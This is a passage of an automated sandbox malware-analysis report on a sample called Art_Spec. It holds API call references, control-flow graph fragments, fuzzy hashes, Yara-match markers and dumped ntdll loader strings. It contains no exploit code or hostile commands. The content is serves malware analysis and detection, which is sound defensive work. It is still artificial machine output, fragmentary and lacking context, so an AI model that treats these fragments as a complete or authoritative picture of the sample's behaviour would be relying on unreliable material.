                                                        • Opcode Fuzzy Hash: e3d868196a48d853df1b9d5794ef9ab97ac8e7f0c3363c65e698835d9533e37e
                                                        • Instruction Fuzzy Hash: CEE0463A2002147BC620BA5AEC42F9B776CDBC5718F40442AFA08A7242C775BA148AE4

                                                        Control-flow Graph

                                                        control_flow_graph 124 13f2b60-13f2b6c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: d208d12b4b75d97e9a929b357e383fee6bb45a784ed539da1641cc64d77f1b62
                                                        • Instruction ID: b04462930b64444472992489cf7867f9500ee920909b320a7d27ae53cfb9f1af
                                                        • Opcode Fuzzy Hash: d208d12b4b75d97e9a929b357e383fee6bb45a784ed539da1641cc64d77f1b62
                                                        • Instruction Fuzzy Hash: 4990026161280143410671594514616400A97F0201B55C032E10145D5DC63589D16625
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 56a08a3936f89341aba5a2d687c57eb08a992b10046c0bbf8e0dd95a94d0ec11
                                                        • Instruction ID: c1f91a5473c388d4e295ec2b9208c2d6c648bfc0214ac60bfb8534ea61156d2d
                                                        • Opcode Fuzzy Hash: 56a08a3936f89341aba5a2d687c57eb08a992b10046c0bbf8e0dd95a94d0ec11
                                                        • Instruction Fuzzy Hash: 0F90023161180553D11271594604707000997E0241F95C423A042459DDD7768A92A621
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 26abf816c0bd0d527bd554ced65dc960d12b95e29249d2c296c8777527dcfe12
                                                        • Instruction ID: 588fe6cd9f00427923295f1e6f00f600b68916a487e5e663b196aed6db70798d
                                                        • Opcode Fuzzy Hash: 26abf816c0bd0d527bd554ced65dc960d12b95e29249d2c296c8777527dcfe12
                                                        • Instruction Fuzzy Hash: 8390023161188942D1117159850474A000597E0301F59C422A442469DDC7B589D17621
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 13047b5916f0e40fbb8aa3128b199226f046787430d704161e68e72d7ed6b819
                                                        • Instruction ID: 2ece09d45874a90a8061e125b3e37cba69ffaea4bc08337e837f6e70ec38ee91
                                                        • Opcode Fuzzy Hash: 13047b5916f0e40fbb8aa3128b199226f046787430d704161e68e72d7ed6b819
                                                        • Instruction Fuzzy Hash: A0900231A1590542D10171594614706100597E0201F65C422A04245ADDC7B58A916AA2

                                                        Control-flow Graph

                                                        APIs
                                                        • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 004141C0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_Art_Spec.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: N77o9w1836$N77o9w1836
                                                        • API String ID: 1836367815-4204696664
                                                        • Opcode ID: 8ea4ead0e8cd57c9f89eace35bfd1dc7174b74ea8ef28197ce62b30bf92eeec6
                                                        • Instruction ID: dbf1be6ef26193e51bcc14fecf1d30848757df0a307f1d3da546311ca6c9474a
                                                        • Opcode Fuzzy Hash: 8ea4ead0e8cd57c9f89eace35bfd1dc7174b74ea8ef28197ce62b30bf92eeec6
                                                        • Instruction Fuzzy Hash: AC012671E4421876EB20AA919C02FDF7B7C8F81B54F00405AFA047B2C0D6FC6A028BE9

                                                        Control-flow Graph

                                                        APIs
                                                        • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 004141C0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_Art_Spec.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: N77o9w1836$N77o9w1836
                                                        • API String ID: 1836367815-4204696664
                                                        • Opcode ID: 4726a8767bcfae0c73df2ffdf9b9d8f716a96223d0d12ea76fede153f4199ba2
                                                        • Instruction ID: dbf1be6ef26193e51bcc14fecf1d30848757df0a307f1d3da546311ca6c9474a
                                                        • Opcode Fuzzy Hash: 4726a8767bcfae0c73df2ffdf9b9d8f716a96223d0d12ea76fede153f4199ba2
                                                        • Instruction Fuzzy Hash: AC012671E4421876EB20AA919C02FDF7B7C8F81B54F00405AFA047B2C0D6FC6A028BE9

                                                        Control-flow Graph

                                                        control_flow_graph 28 414129-414130 29 414171-414174 28->29 30 414132-41413a 28->30 31 41417a-4141b1 call 4047b3 call 424973 29->31 32 414175 call 417b13 29->32 37 4141d3-4141d8 31->37 38 4141b3-4141c4 PostThreadMessageW 31->38 32->31 38->37 39 4141c6-4141d0 38->39 39->37
                                                        APIs
                                                        • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 004141C0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_Art_Spec.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: N77o9w1836$N77o9w1836
                                                        • API String ID: 1836367815-4204696664
                                                        • Opcode ID: 863dc4bff13a2bdcc0c376cc7bbc13f0ec12c02fa508ca47bb0c3be5bc91d30a
                                                        • Instruction ID: 7538764d688f28e64d3d492fe8e1fb6d99a2cdbcdddd34a5648222fe9cda664d
                                                        • Opcode Fuzzy Hash: 863dc4bff13a2bdcc0c376cc7bbc13f0ec12c02fa508ca47bb0c3be5bc91d30a
                                                        • Instruction Fuzzy Hash: 61012672A4621876DB215B55AC02FEFB7689F81B20F000097FE04AB384D6B85A9187D9

                                                        Control-flow Graph

                                                        control_flow_graph 40 414125-41417f 42 414186-4141b1 call 424973 40->42 43 414181 call 4047b3 40->43 46 4141d3-4141d8 42->46 47 4141b3-4141c4 PostThreadMessageW 42->47 43->42 47->46 48 4141c6-4141d0 47->48 48->46
                                                        APIs
                                                        • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 004141C0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_Art_Spec.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: N77o9w1836$N77o9w1836
                                                        • API String ID: 1836367815-4204696664
                                                        • Opcode ID: 72420f6d607e8fd737dc359c4c0924d759aae12716c13a9b50de654840b7993e
                                                        • Instruction ID: be414c5d9c22e3dbbac0c223527f73d90a181cd4a999129798f9bcd0ab32efbc
                                                        • Opcode Fuzzy Hash: 72420f6d607e8fd737dc359c4c0924d759aae12716c13a9b50de654840b7993e
                                                        • Instruction Fuzzy Hash: B0F02BB5E4126875D72156915C06FEF7B688F81B50F144096FE007B2C1D6F85A4287D9

                                                        Control-flow Graph

                                                        control_flow_graph 100 42b973-42b9b4 call 404843 call 42c723 RtlAllocateHeap
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(?,0041E33B,?,?,00000000,?,0041E33B,?,?,?), ref: 0042B9AF
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_Art_Spec.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: b40e374f181a5e7f06088c0508af239026d99a37d8f66eebf1b14c84ad172e33
                                                        • Instruction ID: 608937f996600ceb944568eee28253b0e1a79cb224aaa0ff6171d668f3876b15
                                                        • Opcode Fuzzy Hash: b40e374f181a5e7f06088c0508af239026d99a37d8f66eebf1b14c84ad172e33
                                                        • Instruction Fuzzy Hash: DFE092B63042057BD610EE89EC41E9B37ACEFC9710F008419F909A7281D770BA10CBB5

                                                        Control-flow Graph

                                                        control_flow_graph 105 42b9c3-42ba04 call 404843 call 42c723 RtlFreeHeap
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8BF45589,00000007,00000000,00000004,00000000,004173E6,000000F4,?,?,?,?,?), ref: 0042B9FF
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_Art_Spec.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: fcd5d671ee9e321fa56ff1596bf8a23d3577d32d5066f935f20ed2a0fd690b71
                                                        • Instruction ID: 42988263531b94dbbb2a4d015e1e709027e39004e6f1cdd4b6e0b11babbf2e4c
                                                        • Opcode Fuzzy Hash: fcd5d671ee9e321fa56ff1596bf8a23d3577d32d5066f935f20ed2a0fd690b71
                                                        • Instruction Fuzzy Hash: C3E06D762042447BD610EE59EC41EDB33ACEFC4710F004419F908A7241D671B9118AB4

                                                        Control-flow Graph

                                                        control_flow_graph 115 42ba13-42ba4c call 404843 call 42c723 ExitProcess
                                                        APIs
                                                        • ExitProcess.KERNEL32(?,00000000,?,?,EE1174AF,?,?,EE1174AF), ref: 0042BA47
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_Art_Spec.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: f4c8ccc93cc9a54f4d2a5ff418d0cbb94d9e43498e2faa9f5866a5e759374b8d
                                                        • Instruction ID: 38e42b315f6343636fcddd2e2961c7e70ce04384088d5dfede6638441cba869f
                                                        • Opcode Fuzzy Hash: f4c8ccc93cc9a54f4d2a5ff418d0cbb94d9e43498e2faa9f5866a5e759374b8d
                                                        • Instruction Fuzzy Hash: 91E04F362102147BD110BA5ADC41FDBB76CDFC5714F004419FA0C67242D6707A1186E4

                                                        Control-flow Graph

                                                        control_flow_graph 120 13f2c0a-13f2c0f 121 13f2c1f-13f2c26 LdrInitializeThunk 120->121 122 13f2c11-13f2c18 120->122
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: be1a45ff1c783afca4ed5f8db2847d83c70a74692a8304be6e2f9e853d9c4056
                                                        • Instruction ID: 40f17b9abc4e5a11b7234fde54eca58a87b5f9aed2c49df71f13bedcf31bee13
                                                        • Opcode Fuzzy Hash: be1a45ff1c783afca4ed5f8db2847d83c70a74692a8304be6e2f9e853d9c4056
                                                        • Instruction Fuzzy Hash: 26B09B71D019C5C5DE12E76447087177900B7D0705F15C076D3030686F8738C1D1E675
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-2160512332
                                                        • Opcode ID: 57a4aaba3fd7b6091dec39b91a55d8271e8afc12d2db20e78ca99cf338697e31
                                                        • Instruction ID: 0690fbc85b6e39226d86efc5590c0ad3a02e0fd217d974e5ad1ae8dc7e2427fc
                                                        • Opcode Fuzzy Hash: 57a4aaba3fd7b6091dec39b91a55d8271e8afc12d2db20e78ca99cf338697e31
                                                        • Instruction Fuzzy Hash: 33928E71604342ABE725DF29C841F6BBBE8BB88754F04491EFA94D7360D7B0E845CB92
                                                        Strings
                                                        • Critical section debug info address, xrefs: 0142541F, 0142552E
                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0142540A, 01425496, 01425519
                                                        • undeleted critical section in freed memory, xrefs: 0142542B
                                                        • corrupted critical section, xrefs: 014254C2
                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014254E2
                                                        • Thread identifier, xrefs: 0142553A
                                                        • 8, xrefs: 014252E3
                                                        • Address of the debug info found in the active list., xrefs: 014254AE, 014254FA
                                                        • double initialized or corrupted critical section, xrefs: 01425508
                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014254CE
                                                        • Invalid debug info address of this critical section, xrefs: 014254B6
                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01425543
                                                        • Critical section address., xrefs: 01425502
                                                        • Critical section address, xrefs: 01425425, 014254BC, 01425534
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                        • API String ID: 0-2368682639
                                                        • Opcode ID: cc8faa276f6b4509142d59d84c507ae91e312654550cb31f03b8b869a7c8e53a
                                                        • Instruction ID: 034469774adf101a0d5ea47d00ae87e049e3c53a5aa191d485c42d1e393c4be6
                                                        • Opcode Fuzzy Hash: cc8faa276f6b4509142d59d84c507ae91e312654550cb31f03b8b869a7c8e53a
                                                        • Instruction Fuzzy Hash: E8817C71A40368AFDF20CF99C845BEEBBB5FB49718F50415AE504BB390D375A981CB50
                                                        Strings
                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01422624
                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01422412
                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014224C0
                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014222E4
                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014225EB
                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01422602
                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0142261F
                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01422498
                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01422506
                                                        • @, xrefs: 0142259B
                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01422409
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                        • API String ID: 0-4009184096
                                                        • Opcode ID: 7d23bec877956fb481706d7d1c1441178fc45f7fafaff2d96181b137b659e37b
                                                        • Instruction ID: 27b665e1d9b9f34ae1d4941c2d268c0cadf7d4981a850cdfcd7d3074ba87b307
                                                        • Opcode Fuzzy Hash: 7d23bec877956fb481706d7d1c1441178fc45f7fafaff2d96181b137b659e37b
                                                        • Instruction Fuzzy Hash: 54026FF1D002399BDF31DB58CC84B9AB7B8AB54708F4041EAE609A7291DB709ED4CF59
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                        Strings
                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01438A3D
                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01438A67
                                                        • VerifierDebug, xrefs: 01438CA5
                                                        • VerifierDlls, xrefs: 01438CBD
                                                        • AVRF: -*- final list of providers -*- , xrefs: 01438B8F
                                                        • HandleTraces, xrefs: 01438C8F
                                                        • VerifierFlags, xrefs: 01438C50
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01409A11, 01409A3A
                                                        • LdrpInitShimEngine, xrefs: 014099F4, 01409A07, 01409A30
                                                        • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01409A2A
                                                        • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 014099ED
                                                        • Getting the shim user exports failed with status 0x%08lx, xrefs: 01409A01
                                                        • apphelp.dll, xrefs: 013A6496
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                        Strings
                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0142219F
                                                        • SXS: %s() passed the empty activation context, xrefs: 01422165
                                                        • RtlGetAssemblyStorageRoot, xrefs: 01422160, 0142219A, 014221BA
                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01422178
                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014221BF
                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01422180
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                        Strings
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01428181, 014281F5
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 013EC6C3
                                                        • Loading import redirection DLL: '%wZ', xrefs: 01428170
                                                        • LdrpInitializeProcess, xrefs: 013EC6C4
                                                        • LdrpInitializeImportRedirection, xrefs: 01428177, 014281EB
                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 014281E5
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                        APIs
                                                          • Part of subcall function 013F2DF0: LdrInitializeThunk.NTDLL ref: 013F2DFA
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013F0BA3
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013F0BB6
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013F0D60
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013F0D74
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                        • String ID:
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c$x,$x,
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 013E8421
                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 013E855E
                                                        • @, xrefs: 013E8591
                                                        • LdrpInitializeProcess, xrefs: 013E8422
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                        Strings
                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014222B6
                                                        • .Local, xrefs: 013E28D8
                                                        • SXS: %s() passed the empty activation context, xrefs: 014221DE
                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014221D9, 014222B1
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                        Strings
                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01423437
                                                        • RtlDeactivateActivationContext, xrefs: 01423425, 01423432, 01423451
                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01423456
                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0142342A
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                        Strings
                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01410FE5
                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014110AE
                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0141106B
